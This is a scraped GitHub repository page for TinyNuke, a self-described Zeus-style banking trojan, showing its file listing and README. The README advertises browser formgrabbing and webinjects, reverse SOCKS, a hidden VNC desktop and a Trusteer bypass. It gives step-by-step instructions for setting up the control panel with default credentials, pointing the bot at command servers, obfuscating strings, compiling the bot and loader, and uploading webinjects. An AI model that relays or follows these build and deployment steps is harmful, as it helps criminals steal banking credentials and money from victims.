zeus-style banking trojan
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
.vs/TinyNuke/v14 First Commit Mar 12, 2017
AiJson First Commit Mar 12, 2017
AutoEncrypt First Commit Mar 12, 2017
Bot replaced tabs Mar 12, 2017
CreateDllInjectPayload First Commit Mar 12, 2017
HiddenDesktop First Commit Mar 12, 2017
Loader First Commit Mar 12, 2017
MinHook First Commit Mar 12, 2017
SocksServer First Commit Mar 12, 2017
panel First Commit Mar 12, 2017
wow64ext replaced tabs Mar 12, 2017
.gitattributes 👾 Added .gitattributes & .gitignore files Mar 12, 2017
.gitignore 👾 Added .gitattributes & .gitignore files Mar 12, 2017
Api.cpp ) Mar 12, 2017
Api.h replaced tabs Mar 12, 2017
AutoEncrypt.exe First Commit Mar 12, 2017
Common.h First Commit Mar 12, 2017
HTTP.cpp replaced tabs Mar 12, 2017
HTTP.h replaced tabs Mar 12, 2017
Inject.cpp replaced tabs Mar 12, 2017
Inject.h First Commit Mar 12, 2017
Panel.cpp First Commit Mar 12, 2017
Panel.h First Commit Mar 12, 2017
README.md minor formatting Jun 26, 2017
TinyNuke.VC.db First Commit Mar 12, 2017
TinyNuke.sdf edited readme Mar 12, 2017
TinyNuke.sln First Commit Mar 12, 2017
TinyNuke.v11.suo edited readme Mar 12, 2017
Utils.cpp replaced tabs Mar 12, 2017
Utils.h First Commit Mar 12, 2017
enc.cmd First Commit Mar 12, 2017

README.md

NOTE

This repo is a fork of one which has since been deleted by its author. I didn't write the code, but find it useful (hence, forked it). I don't offer support for it, but don't plan to delete it either.

Original README follows:


This repository contains the source code of TinyNuke which is a zeus-style trojan written by me.

Main Features:

  • Formgrabber and Webinjects for Firefox, Internet Explorer and Chrome. Can inject x86 as well as x64 browsers.
  • Reverse SOCKS 4
  • HVNC like Hidden Desktop
  • Trusteer Bypass
  • ~32kb binary with obfuscated strings ~20kb without

Installation:

  • To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php

  • Open TinyNuke.sln and provide your server Api.cpp like this:

    Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR; Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR; Strs::host[2] = 0;

    To obfuscate strings between the ENC_STR_A and END_ENC_STR, backup Api.cpp then use the AutoEncrypt project, a binary is located in the root directory

  • Compile the Bot project for the x64 and x86 platforms and upload the binaries to the panel in the settings page

  • Upload your webinject file, format can be seen in private/injects.json in the panel folder if you have no webinjects provide an empty JSON object "{}"

  • Compile the Loader project to get your PE file

Usage and additional info can be found within the code (HiddenDesktop/VNC server folder = HiddenDesktop, Reverse SOCKS 4 server = SocksServer)